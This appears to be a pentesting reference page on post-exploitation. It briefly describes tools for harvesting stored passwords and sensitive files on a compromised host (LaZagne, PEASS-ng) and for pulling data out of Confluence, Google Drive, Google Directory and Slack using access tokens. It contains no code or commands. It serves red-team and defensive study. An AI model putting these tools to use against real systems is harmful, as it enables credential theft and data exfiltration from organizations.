Pentesting

Post Exploitation

Local l00t

  • PEASS-ng: These scripts, apart for looking for PE vectors, will look for sensitive information inside the filesystem.

  • LaZagne: The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

External Services

  • Conf-Thief: This Module will connect to Confluence's API using an access token, export to PDF, and download the Confluence documents that the target has access to.

  • GD-Thief: Red Team tool for exfiltrating files from a target's Google Drive that you(the attacker) has access to, via the Google Drive API. This includes includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.

  • GDir-Thief: Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API.

  • SlackPirate: This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.

  • Slackhound: Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes collection of an organization's users, files, messages, etc. quickly searchable and large objects are written to CSV for offline review.